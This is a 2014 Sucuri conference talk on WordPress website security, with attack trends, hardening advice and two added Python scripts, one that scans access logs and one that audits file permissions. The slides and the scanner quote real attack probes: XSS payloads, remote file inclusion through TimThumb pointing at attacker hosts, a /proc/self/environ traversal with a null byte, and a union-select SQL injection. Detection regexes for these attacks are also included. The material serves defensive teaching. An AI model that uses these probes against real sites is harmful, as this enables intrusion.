Website Security (WordPress)
- Organization: Sucuri, Inc. (@sucuri_security, @perezbox)
- Specialization: Website Security, Incident Handling
- Special Interests: Brazilian Jiu-Jitsu
Tony Perez | @perezbox | @sucuri_security | 4/29/2014
- Website Security Company
- Global Operations
- Platform Agnostic (i.e., Joomla, WordPress, etc.)
- Scan 2M Unique Domains a Month
- Block 4M web attacks a Month
- Remediate 400-500 websites a day
- Signature / Heuristic Based
- 24/7 operations
Agenda:
- Trends
- Threats
- Defenses
SIMPLE RIGHT?
[Chart: Data Breaches (Millions), 2011 vs 2013]
[Chart: Malicious Websites vs Legitimate Websites]
[Chart: Exploitable vs Not-Exploitable. 1 in 8: Critical Vulnerability]
[Chart: malware types by share. Legend, in order: Remote iFrame Includes, Remote JavaScript Includes, SPAM Injections, Obfuscated / Encoded JavaScript, Conditional Redirects, Defacements, Other. Shares shown, in the order extracted: 26%, 19%, 16%, 14%, 11%, 4%, 10%]
- Going deeper than the application layer, targeting the server.
- Server polymorphism, a.k.a. highly adaptive / sophisticated.
- Examples: Darkleech, Cdork (Apache), Ebury (SSH), Email Server (SPAM), Heartbleed (OpenSSL)
SPAM injection themes:
- Pharmacy
- Payday Loans
- Exploiting Access Control
[Diagram: Cross-Site Contamination across Site 1, Site 2, Site 3 and Site 4. Sites that share one hosting account share one set of file-system permissions, so once one of them is compromised the attacker's write access reaches its neighbours.]
- Explosion in the Malware as a Service (MaaS) trade
- Yes, pay someone to hack for you
- Different tools to break in and generate payloads
- Brute force and vulnerability exploits
- Malware payloads
- Blackhole exploit kit author arrested
[Chart: exploit kit share. Legend, in order: Neutrino, Unknown Kit, Redkit, SweetOrange, Styx, Glazunov/Sibhost, Nuclear, Blackhole/Cool, Other. Shares shown, in the order extracted: 25%, 22%, 9%, 1%, 11%, 5%, 12%, 10%, 5%, 0%]
What kind of website do you have? What would an attacker do with it?
- Use it for malware?
- Burrow into your network?
- Steal data?
Cross-site scripting (XSS) probes as they appear in an access log. The second one is URL-encoded; decoded it reads </script><img src=@ onerror=alert(7872) />:
38.123.140.6 - - [18/Feb/2013:18:23:23 -0500] "GET /cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1" 302 227 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
123.151.39.41 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3E HTTP/1.1" 404 268
- Stored
- Reflected
File inclusion probes. The first two target TimThumb-style image resizers (timthumb.php, thumb.php) with a remote URL in the src parameter: remote file inclusion, with hostnames crafted to start with a name on TimThumb's allow-list (flickr, wordpress.com). The third is a directory traversal against a Joomla component, walking up to /proc/self/environ with a null byte (%00) appended to truncate whatever suffix the script adds: local file inclusion.
[02/Apr/2013:00:32:58 -0400] "GET /results/wp-content/themes/Convertible/timthumb.php?src=http%3A%2F%2Fflickr.easyneffective.com%2Fcrotz.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
83.170.99.221 - - [03/Apr/2013:13:03:16 -0400] "GET /results/chinchedbistro.com&sa=U&ei=vGBcUYS1IcOaiQLxu4HIBg&ved=0CCYQFjAE&usg=AFQjCNFN1APEnX9-WPS337kMyPUz0yDM8A/wp-content/themes/vulcan/lib/scripts/thumb.php?src=http://wordpress.com.4creatus.com/info.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
82.98.131.101 - - [03/Apr/2013:12:59:56 -0400] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
SQL injection probe: a union select appended to a query-string parameter, with -- to comment out the rest of the original query.
62.122.71.181 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336 "-" "Mozilla/5.0 (Windows NT;en-us) Firefox/3.5.9"
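The requests on the last three slides are the kinds of probe a WordPress access log fills up with every day: XSS payloads, a remote URL fed to a TimThumb-style src parameter, a traversal to /proc/self/environ with a null byte, and a union select. The script below is an added example, not something from the talk or from Sucuri's products: it parses combined-format log lines, decodes each request path the way PHP would see it, and labels it against a small signature list. The signature list and the one benign request are this example's own constructions; the attacker hostnames come from the slides and are historical, so do not contact them. Note what a log cannot tell you: it shows an XSS payload being delivered, but not whether the application stored it (stored) or echoed it straight back (reflected).

```python
import re
from urllib.parse import unquote

# Access-log lines from the slides (closing quotes normalised), plus one
# constructed benign request so the negative case is exercised as well.
LOG_LINES = [
    '38.123.140.6 - - [18/Feb/2013:18:23:23 -0500] "GET /cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1" 302 227 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"',
    '123.151.39.41 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3E HTTP/1.1" 404 268',
    '[02/Apr/2013:00:32:58 -0400] "GET /results/wp-content/themes/Convertible/timthumb.php?src=http%3A%2F%2Fflickr.easyneffective.com%2Fcrotz.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"',
    '82.98.131.101 - - [03/Apr/2013:12:59:56 -0400] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"',
    '62.122.71.181 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336 "-" "Mozilla/5.0 (Windows NT;en-us) Firefox/3.5.9"',
    # Constructed benign request: must produce no finding.
    '203.0.113.7 - - [03/Apr/2013:05:30:00 -0400] "GET /wp-content/uploads/2013/04/logo.png HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

# Combined-log request field: method, path, protocol, then the status code.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3}|-)')

# Signatures applied to the decoded path. This list is the example's own, kept
# deliberately small; a request may carry several labels.
RULES = [
    ("xss",  re.compile(r"<\s*/?\s*script|\bon(?:error|load|mouseover)\s*=|javascript:", re.I)),
    ("rfi",  re.compile(r"[?&]\w+=(?:https?|ftp)://", re.I)),
    ("lfi",  re.compile(r"(?:\.\./){2,}|/proc/self/environ|/etc/passwd|\x00", re.I)),
    ("sqli", re.compile(r"\bunion\b\s+(?:all\s+)?select\b|\bor\s+\d+\s*=\s*\d+\b|--\s*$", re.I)),
]


def normalize(path):
    """Decode a request path the way the application would see it.

    '+' is treated as a space (form encoding) and decoding runs twice so that
    double-encoded payloads (%253C -> %3C -> <) are caught; %00 becomes a real
    NUL byte, the tell-tale of the old PHP null-byte truncation trick.
    """
    return unquote(unquote(path.replace("+", " ")))


def classify_request(line):
    """Return (ip, raw_path, labels) for one log line, or None if it holds no request."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    ip = line.split(" ", 1)[0]
    if ip.startswith("["):  # line has no client field (as on one of the slides)
        ip = "-"
    decoded = normalize(m.group("path"))
    labels = [name for name, rx in RULES if rx.search(decoded)]
    return ip, m.group("path"), labels


def scan(lines):
    """One finding per suspicious request: dicts with ip, path and labels."""
    findings = []
    for line in lines:
        parsed = classify_request(line)
        if parsed and parsed[2]:
            ip, path, labels = parsed
            findings.append({"ip": ip, "path": path, "labels": labels})
    return findings


if __name__ == "__main__":
    for f in scan(LOG_LINES):
        print(f"{f['ip']:<15} {','.join(f['labels']):<5} {f['path'][:80]}")
```

Run it against a real log with `scan(open("access.log"))`; the status code is captured so you can prioritise probes that returned 200 (the TimThumb requests above did) over those that 404'd.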
Backdoored "free" copies of premium plugins (write-up: http://blog.sucuri.net/2014/03/unmasking-free-premium-wordpress-plugins.html):
- SEOPressor: payload located in wp-content/plugins/seo-pressor(gratuit), file central.class.php
- Flat Skins Pack Extension: payload located in wp-content/ubermenu-skins-flat
- Restrict Content Pro: payload located in wp-content/restrict-content-pro/includes/, file sidebar.php
Impact of a compromise:
- Brand Reputation
- Legal Implications
- Impact to Sales
- Blacklisted by Search Engines
- Blacklisted by Payment Processors
- Worst Day of Your Life
Sucuri properties suffer:
- ~125,000 web-based attacks a month on average
- ~4,000 attacks a day (this spikes on occasion)
- Doesn't include server-level attacks
- All flavors of attacks
Defenses:
- Principles
- Access Control
- Vulnerabilities
"It's about risk reduction... risk will never be zero..."
Defense in Depth:
"...a concept in which multiple layers of security controls (defenses) are placed throughout an information technology (IT) system. Its intent is to provide redundancy in the event a security control fails or a vulnerability is exploited..."
- Passwords: complex, long, unique
Least Privilege:
"requires that in a particular abstraction layer of a computing environment, every module (such as a process, a user or a program depending on the subject) must be able to access only the information and resources that are necessary for its legitimate purpose."
- Disable PHP execution where only static files belong. The slide lists /wp-includes, /wp-content, /themes, /plugins and /uploads. wp-content/uploads is the safe, universal case, since legitimate uploads are never PHP; a blanket deny across wp-includes, plugins or themes breaks any script in those trees that browsers request directly, so test those paths first (the WordPress hardening page linked in the resources publishes a narrower rule set for wp-includes).
  Place this .htaccess in the directory (Apache 2.2 syntax; on Apache 2.4 replace "Deny from all" with "Require all denied"):
<Files *.php>
Deny from all
</Files>
- wp-config.php modification. Disable the built-in plugin/theme editor so that a hijacked administrator session cannot write PHP through wp-admin. Add the line above the "stop editing" comment, using plain ASCII quotes (the curly quotes on the slide would not parse). Note that this does not block plugin or theme uploads and updates; DISALLOW_FILE_MODS covers those.
# Disable Plugin / Theme Editor
define('DISALLOW_FILE_EDIT', true);
NOT THAT HARD!!!!
The Bare Minimum:
1. Connect securely: SFTP / SSH
2. Authentication keys / wp-config (the unique keys and salts in wp-config.php)
3. Use trusted sources
4. Use a local antivirus (Mac too)
5. Permissions: directories 755, files 644
6. Least-privilege principles
7. Accountability
8. Backups, including the database

Ideal implementations:
1. Employ a website firewall
2. Don't let WordPress write to itself
3. Filter access by IP
4. Use a dedicated server / VPS
5. Monitor all activity (logging)
6. Enable SSL for transactions
7. Keep the environment current (patched)
8. No "soup kitchen" servers

Common mistakes (what not to do):
1. Fix the index.php file and assume all is fine.
2. Panic your way into the WordPress forums after a hack.
3. Don't worry about updating.
4. Trust third-party extensions.
5. Apply all upgrades on the live site.
6. Install and forget; all is well with your new site.
7. Use the same username and password for everything.
8. Don't waste time making security adjustments to PHP and settings.
9. No regular backups required.
10. Use the cheapest host.
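The baseline in these lists and on the earlier hardening slides (directories 755, files 644, no PHP where only uploads belong, wp-config.php kept private, the file editor disabled) can be checked mechanically rather than by eye. The script below is an added example, not Sucuri's tooling or anything shown in the talk: it walks a WordPress docroot, reports each deviation, and applies the matching fix. The miniature install it builds in a temp directory is a constructed fixture so the script runs without a real site; the check names and the 640 mode chosen for wp-config.php are this example's choices, not the slide's.

```python
import os
import re
import shutil
import stat
import tempfile

# Matches define('DISALLOW_FILE_EDIT', true); with either quote style.
EDITOR_OFF_RE = re.compile(r"define\(\s*['\"]DISALLOW_FILE_EDIT['\"]\s*,\s*true\s*\)", re.I)


def mode_of(path):
    """Permission bits only (no file-type bits), e.g. 0o755."""
    return stat.S_IMODE(os.lstat(path).st_mode)


def wp_audit(root):
    """Return (check, path) findings for the WordPress tree at root; [] means clean."""
    findings = []
    config = os.path.join(root, "wp-config.php")
    uploads = os.path.join(root, "wp-content", "uploads")

    for dirpath, _dirnames, filenames in os.walk(root):
        # Directories: exactly 755. A group- or world-writable directory is how one
        # compromised site on a shared account contaminates its neighbours.
        if mode_of(dirpath) != 0o755:
            findings.append(("dir-not-755", dirpath))
        for name in filenames:
            path = os.path.join(dirpath, name)
            if path == config or os.path.islink(path):
                continue  # wp-config.php is checked separately; symlinks are skipped
            if mode_of(path) != 0o644:
                findings.append(("file-not-644", path))
            # Legitimate uploads are never PHP. Even when .htaccess blocks execution,
            # a .php file here is an intrusion indicator worth alerting on.
            if path.startswith(uploads + os.sep) and name.lower().endswith(".php"):
                findings.append(("php-in-uploads", path))

    if not os.path.isfile(config):
        findings.append(("wp-config-missing", config))
        return findings
    # wp-config.php holds DB credentials and salts: 'other' must not be able to read it.
    if mode_of(config) & stat.S_IROTH:
        findings.append(("wp-config-world-readable", config))
    with open(config, encoding="utf-8", errors="replace") as fh:
        if not EDITOR_OFF_RE.search(fh.read()):
            findings.append(("file-editor-enabled", config))
    return findings


def remediate(root):
    """Apply the fix for each finding. On a real incident, quarantine PHP found in
    uploads for analysis instead of deleting it, and put the define() above the
    'stop editing' comment in wp-config.php rather than appending it."""
    for check, path in wp_audit(root):
        if check == "dir-not-755":
            os.chmod(path, 0o755)
        elif check == "file-not-644":
            os.chmod(path, 0o644)
        elif check == "php-in-uploads":
            os.remove(path)
        elif check == "wp-config-world-readable":
            os.chmod(path, 0o640)  # owner rw, group r (web server user in the group)
        elif check == "file-editor-enabled":
            with open(path, "a", encoding="utf-8") as fh:
                fh.write("define('DISALLOW_FILE_EDIT', true);\n")


def make_fixture():
    """Constructed, deliberately misconfigured mini-install in a temp directory."""
    root = tempfile.mkdtemp(prefix="wp-audit-")
    uploads = os.path.join(root, "wp-content", "uploads")
    os.makedirs(uploads)
    os.makedirs(os.path.join(root, "wp-content", "plugins", "demo"))
    files = {
        os.path.join(root, "index.php"): "<?php\n",
        os.path.join(root, "wp-config.php"): '<?php\ndefine("DB_PASSWORD", "x");\n',  # editor left enabled
        os.path.join(uploads, "shell.php"): "<?php /* stand-in for a dropped web shell */\n",
    }
    for path, body in files.items():
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    for dirpath, _dirnames, filenames in os.walk(root):
        os.chmod(dirpath, 0o755)
        for name in filenames:
            os.chmod(os.path.join(dirpath, name), 0o644)
    os.chmod(uploads, 0o777)                              # world-writable upload directory
    os.chmod(os.path.join(root, "wp-config.php"), 0o666)  # credentials readable by every account
    return root


def cleanup_fixture(root):
    shutil.rmtree(root)


if __name__ == "__main__":
    root = make_fixture()  # replace with the real docroot, e.g. "/var/www/example.com"
    for check, path in wp_audit(root):
        print(f"{check:<26} {path}")
    remediate(root)
    print("after remediation:", wp_audit(root))
    cleanup_fixture(root)
```

Run `wp_audit` alone from cron and alert on any output; `remediate` is shown to make the fixes concrete, but on a production box you want to look at each finding (especially PHP under uploads) before anything is changed or removed.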
Resources:
- Sucuri Blog: http://blog.sucuri.net
- Sucuri TV: http://sucuri.tv
- Malware Scanner: http://sitecheck.sucuri.net
- Malware Scanner: http://unmaskparasites.com
- Badware Busters: https://badwarebusters.org
- Google Forums: http://productforums.google.com/forum/#!categories/webmasters/malware--hacked-sites
- Google Webmaster Tools: http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163633
- Secunia Security Advisories: http://secunia.com/community/advisories/search/?search=wordpress
- Exploit-DB: http://www.exploit-db.com/search/?action=search&filter_description=Wordpress&filter_platform=31
- WordPress Hacked FAQ: http://codex.wordpress.org/FAQ_My_site_was_hacked
- WordPress Hardening: http://codex.wordpress.org/Hardening_WordPress
Sucuri, Inc.
Tony Perez
http://sucuri.net
http://blog.sucuri.net
@perezbox | @sucuri_security

WordCamp Minneapolis 2014 - Website Security Presentation - Sucuri Security
